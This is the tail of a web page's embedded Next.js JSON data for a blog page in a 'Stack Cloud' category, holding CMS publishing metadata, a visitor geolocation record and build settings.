Cloud","updated_at":"2024-02-26T10:57:21.311Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/category/stack-cloud","publish_details":{"time":"2024-10-16T12:31:22.574Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],8],"gdprData":{"ip":"52.11.195.251","country_code":"US","city":"boardman","in_eu":false,"lang":"*"},"contentFound":true,"__N_SSP":true},"page":"/default_detail","query":{},"buildId":"Vl2WrvhD4hELkCAgiQD_z","runtimeConfig":{"public":"public","env":"production"},"isFallback":false,"gssp":true,"customServer":true,"appGip":true,"scriptLoader":[]}</script></body></html>